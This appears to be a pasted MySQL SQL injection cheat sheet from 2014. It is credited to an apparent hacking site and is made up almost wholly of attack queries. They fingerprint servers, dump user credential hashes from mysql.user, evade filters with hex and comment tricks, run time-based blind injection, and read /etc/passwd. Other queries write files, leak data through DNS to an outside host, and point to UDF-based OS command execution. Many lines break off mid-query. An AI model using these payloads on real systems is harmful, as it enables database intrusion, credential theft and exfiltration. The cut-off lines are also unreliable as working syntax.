Googleinurl

[INFO]=> QUERYS SQL ~ INJECTION

Jul 16th, 2014
Version:
SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os
Directories:
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir
Users:
#USER() is the user@host the client connected as; CURRENT_USER() is the account the server actually matched in mysql.user, i.e. the one whose privileges apply. They differ when a wildcard host entry or an anonymous account was matched.
SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()
Current Database:
SELECT DATABASE()
Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
Multi-Concat:
#Concatenates the values of column "foo" from the table "bar" together, using the separa
#Note: This operation can by default only grab 1024 bytes, and do no
#The 1024 byte limit is stored in the @@group_concat_max_len variabl
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
Better-Concat:
#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
#which therefore allows you to concat strings together up to the @@ma
#instead of @@group_concat_max_len. The default value for @@max_allo
#1048576 bytes, instead of @@group_concat_max_len's 1024.
#Caveat: 1 MB is the old default. @@max_allowed_packet defaults to 4 MB from 5.6.6 and 64 MB in 8.0, while @@group_concat_max_len is still 1024; read both variables on the target instead of assuming, or output that looks complete may silently be truncated.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
Change Character Set:
#CONVERT(... USING ...) changes the character set of a string, which is what matters when a UNION column refuses to mix collations.
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all row(s) st
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all row(s) en
Regular Expression in SELECT(s):
#Returns all rows whose id matches the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
SELECT Without Duplicates:
SELECT DISTINCT foo FROM bar
Counting Rows:
SELECT COUNT(foo) FROM bar; #Returns the number of non-NULL "foo" values from t
Get Number of MySQL Users:
SELECT COUNT(user) FROM mysql.user
Get MySQL Users:
SELECT user FROM mysql.user
Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us
Get MySQL User Privileges on Different Databases:
SELECT grantee,table_schema,privilege_type FROM information_schema.sc
Get MySQL User Privileges on Different Columns:
SELECT table_schema,table_name,column_name,privilege_type FROM infor
Get MySQL User Credentials & Privileges:
#Reading mysql.user needs SELECT on the mysql database. The "password" column holds the hashes up to 5.6; from 5.7 it was removed and the hash lives in "authentication_string", so adjust the column name or the query errors out.
SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
Repl_client_priv) FROM mysql.user
Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us
SELECT host,user FROM mysql.user WHERE Super_priv='Y'
Get Databases:
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables
Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.colu
Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.c
SELECT A Certain Row:
#LIMIT offset,count is zero-based. Add an ORDER BY if you need the same row to come back on every request.
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.
Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" 10000 times. A CPU-bound delay for time-based blind injection where SLEEP() is not available; the delay depends on server load, so calibrate the iteration count.
SELECT BENCHMARK(10000,MD5(1))
Sleep:
#SLEEP() exists from MySQL 5.0.12 onwards.
#Sleeps for 5 seconds, returns 0 on success (1 if the sleep was interrupted).
SELECT SLEEP(5)
Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: 65 (as a string). CAST does not turn a code into a character; use CHAR(65) for that.
Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo
Hexadecimal Evasion:
#A hex literal is a binary string in string context (no quotes needed, so it survives addslashes/magic_quotes), but a number in numeric context.
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :
ASCII to Number:
SELECT ASCII('A'); #Returns: 65
Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test
If Statement:
#ASCII 53 is '5' and 52 is '4'. Only the first character of VERSION() is compared, so MySQL 8.x needs 56, and a MariaDB 10.x build starts with '1'.
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
Read File(s):
#Requires you to have the File_priv in mysql.user. On error this stat
#Also subject to @@secure_file_priv: if it names a directory, only files under that directory can be read or written; if it is NULL, file import/export is disabled entirely. Since 5.7.6 most packages ship with it set to a dedicated directory, so File_priv alone is no longer enough. The file is read by the mysqld process, so it must be readable by the server's OS user.
SELECT LOAD_FILE('/etc/passwd')
Write File(s):
#You must use quotes on the filename! The file is created by the server process (not the client), must not already exist, and ends up owned by the mysqld user; the same @@secure_file_priv rule applies.
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
Logical Operator(s):
AND, &&; #The AND operator has && as an alternative syntax.
OR, ||;  #The OR operator has || as an alternative syntax, unless PIPES_AS_CONCAT is in sql_mode, in which case || is string concatenation.
NOT, !; #The NOT operator has ! as an alternative syntax.
XOR; #The XOR operator has no alternative syntax.
Fuzzy Code Comment:
#Code within /*! ... */ is executed by MySQL but treated as a comment by other databases and by many filters. Additional /*! can be
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
Comments:
SELECT foo, bar FROM foo.bar-- Single line comment (MySQL only treats -- as a comment when it is followed by whitespace, so in a URL use "-- " or "--+")
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carriage Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parenthesis, ( and ); #Can also be used as separators when used right
Parenthesis instead of space:
#As said two lines above, parentheses can be used as a sep
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
DNS Requests (OOB (Out-Of-Band)):
#Only works when the MySQL server itself runs on Windows: the UNC path makes the server resolve www.your.host.com (and try an SMB connection) when it attempts to create the file, so the lookup shows up in your DNS logs even though nothing is written. Needs File_priv and is subject to @@secure_file_priv like any other INTO OUTFILE.
SELECT YourQuery INTO OUTFILE '\\\\www.your.host.com\\?file_to_save_a
Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS comman
#It can be done if you're able to upload a shared object into /usr/
#The file extension is .so, and it must contain an "User Defined Fun
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU Architecture.
#Also works on 5.x and later (raptor_udf2.c targets those), with one extra constraint: from 5.0.67 / 5.1.19 the library must be placed in the directory named by @@plugin_dir, so you need File_priv plus a plugin directory the mysqld user can write to. On Windows the library is a .dll. Commands run as the mysqld OS user, not as the database account.
#The CPU architecture can be resolved by this query:
SELECT @@version_compile_machine;
A couple of useful blind queries to fingerprint the data
All of these return either True or False, as in, you either get a res
#First character of VERSION(): 53 is '5', 52 is '4'.
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
Got File_priv:
#This and the Super_priv check below read mysql.user, so they only work if the current account can SELECT from the mysql database; the OR-ed clauses map USER() back to the matching user/host row.
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Can MySQL Sleep:
#This query will return True and should take above 1 second to execut
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
Are we on *NIX:
#ASCII 47 is '/', the first character of an absolute Unix path.
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
Does a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
Does a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
Does a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
  192. from:h.ackack(dot)net